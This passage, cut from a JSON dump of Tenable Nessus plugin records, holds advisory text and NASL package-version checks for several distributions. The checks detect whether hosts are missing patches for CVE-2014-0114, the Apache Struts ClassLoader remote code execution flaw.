the 'class' parameter, which is directly mapped to the getClass() method.\nA remote attacker could use this flaw to manipulate the ClassLoader used by an application server running Struts 1. This could lead to remote code execution under certain conditions. (CVE-2014-0114)\n\nAll struts users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. All running applications using struts must be restarted for this update to take effect.", "cvss3": {}, "published": "2014-05-09T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : struts (ELSA-2014-0474)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:struts", "p-cpe:/a:oracle:linux:struts-javadoc", "p-cpe:/a:oracle:linux:struts-manual", "p-cpe:/a:oracle:linux:struts-webapps-tomcat5", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2014-0474.NASL", "href": "https://www.tenable.com/plugins/nessus/73935", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:0474 and \n# Oracle Linux Security Advisory ELSA-2014-0474 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73935);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0114\");\n script_bugtraq_id(67121);\n script_xref(name:\"RHSA\", value:\"2014:0474\");\n\n script_name(english:\"Oracle Linux 5 : struts (ELSA-2014-0474)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2014:0474 :\n\nUpdated struts packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nApache Struts is a framework for building web applications with Java.\n\nIt was found that the Struts 1 ActionForm object allowed access to the\n'class' parameter, which is directly mapped to the getClass() method.\nA remote attacker could use this flaw to manipulate the ClassLoader\nused by an application server running Struts 1. This could lead to\nremote code execution under certain conditions. (CVE-2014-0114)\n\nAll struts users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. All running\napplications using struts must be restarted for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-May/004103.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected struts packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:struts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:struts-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:struts-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:struts-webapps-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"struts-1.2.9-4jpp.8.el5_10\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"struts-javadoc-1.2.9-4jpp.8.el5_10\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"struts-manual-1.2.9-4jpp.8.el5_10\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"struts-webapps-tomcat5-1.2.9-4jpp.8.el5_10\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"struts / struts-javadoc / struts-manual / struts-webapps-tomcat5\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:57", "description": "fix CVE-2014-0114\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-08-23T00:00:00", "type": "nessus", "title": "Fedora 20 : struts-1.3.10-10.fc20 (2014-9380)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:struts", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-9380.NASL", "href": "https://www.tenable.com/plugins/nessus/77351", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9380.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77351);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0114\");\n script_bugtraq_id(67121);\n script_xref(name:\"FEDORA\", value:\"2014-9380\");\n\n script_name(english:\"Fedora 20 : struts-1.3.10-10.fc20 (2014-9380)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"fix CVE-2014-0114\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1091938\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-August/136958.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2fa0f7b0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected struts package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:struts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/23\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"struts-1.3.10-10.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"struts\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:20:02", "description": "Updated struts packages fix security vulnerability :\n\nIt was found that the Struts 1 ActionForm object allowed access to the 'class' parameter, which is directly mapped to the getClass() method.\nA remote attacker could use this flaw to manipulate the ClassLoader used by an application server running Struts 1. This could lead to remote code execution under certain conditions (CVE-2014-0114).", "cvss3": {}, "published": "2014-05-19T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : struts (MDVSA-2014:095)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:struts", "p-cpe:/a:mandriva:linux:struts-javadoc", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-095.NASL", "href": "https://www.tenable.com/plugins/nessus/74073", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:095. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74073);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0114\");\n script_xref(name:\"MDVSA\", value:\"2014:095\");\n\n script_name(english:\"Mandriva Linux Security Advisory : struts (MDVSA-2014:095)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated struts packages fix security vulnerability :\n\nIt was found that the Struts 1 ActionForm object allowed access to the\n'class' parameter, which is directly mapped to the getClass() method.\nA remote attacker could use this flaw to manipulate the ClassLoader\nused by an application server running Struts 1. This could lead to\nremote code execution under certain conditions (CVE-2014-0114).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0219.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected struts and / or struts-javadoc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:struts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:struts-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"struts-1.3.10-3.1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"struts-javadoc-1.3.10-3.1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-23T14:17:00", "description": "The remote host is affected by the vulnerability described in GLSA-201607-09 (Commons-BeanUtils: Arbitrary code execution)\n\n Apache Commons BeanUtils does not suppress the class property, which allows for the manipulation of the ClassLoader.\n Impact :\n\n Remote attackers could potentially execute arbitrary code with the privileges of the process.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2016-07-21T00:00:00", "type": "nessus", "title": "GLSA-201607-09 : Commons-BeanUtils: Arbitrary code execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:commons-beanutils", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201607-09.NASL", "href": "https://www.tenable.com/plugins/nessus/92479", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201607-09.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92479);\n script_version(\"2.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0114\");\n script_xref(name:\"GLSA\", value:\"201607-09\");\n\n script_name(english:\"GLSA-201607-09 : Commons-BeanUtils: Arbitrary code execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201607-09\n(Commons-BeanUtils: Arbitrary code execution)\n\n Apache Commons BeanUtils does not suppress the class property, which\n allows for the manipulation of the ClassLoader.\n \nImpact :\n\n Remote attackers could potentially execute arbitrary code with the\n privileges of the process.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201607-09\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Commons BeanUtils users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=dev-java/commons-beanutils-1.9.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:commons-beanutils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-java/commons-beanutils\", unaffected:make_list(\"ge 1.9.2\"), vulnerable:make_list(\"lt 1.9.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Commons-BeanUtils\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:38", "description": "The version of IBM WebSphere Portal on the remote host is affected by a remote code execution vulnerability in the Apache Struts ClassLoader. A remote attacker can exploit this issue by manipulating the 'class' parameter of an ActionForm object to execute arbitrary code.", "cvss3": {}, "published": "2014-09-05T00:00:00", "type": "nessus", "title": "IBM WebSphere Portal Apache Struts ClassLoader Manipulation RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2021-01-19T00:00:00", "cpe": ["cpe:/a:ibm:websphere_portal", "cpe:/a:apache:struts"], "id": "WEBSPHERE_PORTAL_CVE-2014-0114.NASL", "href": "https://www.tenable.com/plugins/nessus/77535", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77535);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-0114\");\n script_bugtraq_id(67121);\n\n script_name(english:\"IBM WebSphere Portal Apache Struts ClassLoader Manipulation RCE\");\n script_summary(english:\"Checks for installed patches.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has web portal software installed that is\naffected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of IBM WebSphere Portal on the remote host is affected by\na remote code execution vulnerability in the Apache Struts\nClassLoader. A remote attacker can exploit this issue by manipulating\nthe 'class' parameter of an ActionForm object to execute arbitrary\ncode.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www-304.ibm.com/support/docview.wss?uid=swg21680194\");\n # https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin_classloader_manipulation_with_apache_struts_affecting_ibm_websphere_portal_cve_2014_0114?lang=en_us\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6f272d04\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patches listed in the advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/04/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:websphere_portal\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"websphere_portal_installed.nbin\");\n script_require_keys(\"installed_sw/IBM WebSphere Portal\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"websphere_portal_version.inc\");\n\nportlets = make_array();\n\npaa = \"IBM Common PIM\";\nportlets[paa][\"Fixed Version\"] = \"8.03\";\nportlets[paa][\"File\"] = \"\\..\\wp_profile\\paa\\mail\\components\\mail\\version\\mail.component\";\nportlets[paa][\"Version Regex\"] = 'spec-version=\"([0-9\\\\.]+)\"\\\\s*/>';\nportlets[paa][\"WP Ranges\"] = make_list(\"8.5.0.0, 8.5.0.0\", \"8.0.0.0, 8.0.0.1\");\n\n\nwebsphere_portal_check_version(\n checks:make_array(\n \"8.5.0.0, 8.5.0.0, CF01\", make_list(\"PI18707\"),\n \"8.0.0.0, 8.0.0.1, CF12\", make_list(\"PI20686, PI20737, PI20741, PI20861\"),\n \"8.0.0.0, 8.0.0.1, CF13\", make_list(\"PI20737\"),\n \"7.0.0.0, 7.0.0.2, CF28\", make_list(\"PI20686, PI20737, PI20861, PI20741, PI21113\"),\n \"6.1.5.0, 6.1.5.3, CF27\", make_list(\"PI20686, PI20737, PI20861, PI20741, PI21113\"),\n \"6.1.0.0, 6.1.0.6, CF27\", make_list(\"PI20686, PI20737, PI20861, PI20741, PI21113\")\n ),\n severity:SECURITY_HOLE,\n portlets:portlets\n);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:08", "description": "It was discovered that missing access checks in the Struts ActionForm object could result in the execution of arbitrary code.", "cvss3": {}, "published": "2014-08-22T00:00:00", "type": "nessus", "title": "Debian DSA-2940-1 : libstruts1.2-java - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libstruts1.2-java", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2940.NASL", "href": "https://www.tenable.com/plugins/nessus/77306", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2940. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77306);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0114\");\n script_bugtraq_id(67121);\n script_xref(name:\"DSA\", value:\"2940\");\n\n script_name(english:\"Debian DSA-2940-1 : libstruts1.2-java - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that missing access checks in the Struts ActionForm\nobject could result in the execution of arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/libstruts1.2-java\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-2940\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libstruts1.2-java packages.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.9-5+deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libstruts1.2-java\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", 